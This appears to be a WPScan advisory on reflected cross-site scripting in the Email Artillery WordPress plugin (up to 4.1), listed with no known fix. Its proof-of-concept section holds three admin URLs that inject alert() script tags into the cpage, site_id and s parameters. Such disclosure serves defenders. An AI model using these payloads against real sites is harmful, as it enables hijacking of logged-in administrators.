Email Artillery <= 4.1 – Multiple Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not sanitise, validate or escape some user input before outputting back in pages leading to Reflected Cross-Site Scripting issues which will be executed in the context of a logged in admin

Proof of Concept

https://example.com/wp-admin/admin.php?page=etmbu-all-posts&s=yes&markdone=no&cpage="><script>alert(%2FXSS%2F)<%2Fscript>

https://example.com/wp-admin/admin.php?page=etmbu-all-emails&invalid=yes&site_id="><script>alert(/XSS-SiteID/)</script>&s="><script>alert(/XSS-S/)</script>

https://example.com/wp-admin/admin.php?page=etmbu-all-emails&unsub=yes&site_id="><script>alert(%2FXSS-SiteID%2F)<%2Fscript>&s="><script>alert(%2FXSS-S%2F)<%2Fscript>

Affects Plugins

email-artillery

No known fix

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

35e1e5dd-5aa5-4481-b7ed-2ddf00a08986

Timeline

Publicly Published

2021-08-16 (about 4 years ago)

Added

2021-08-16 (about 4 years ago)

Last Updated

2021-08-16 (about 4 years ago)

Other

Published

Title

Published

2023-09-25

Title

PageLayer < 1.7.7 - Unauthenticated Stored XSS

Published

2024-06-27

Title

The Ultimate WordPress Toolkit – WP Extended < 3.0.0 - Unauthenticated Stored Cross-Site Scripting

Published

2023-10-07

Title

RegistrationMagic < 5.2.4.2 - Reflected Cross-Site Scripting via section_id

Published

2024-09-03

Title

Popup Box < 4.7.8 - Admin+ Stored XSS

Published

2024-09-23

Title

WP Datepicker < 2.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting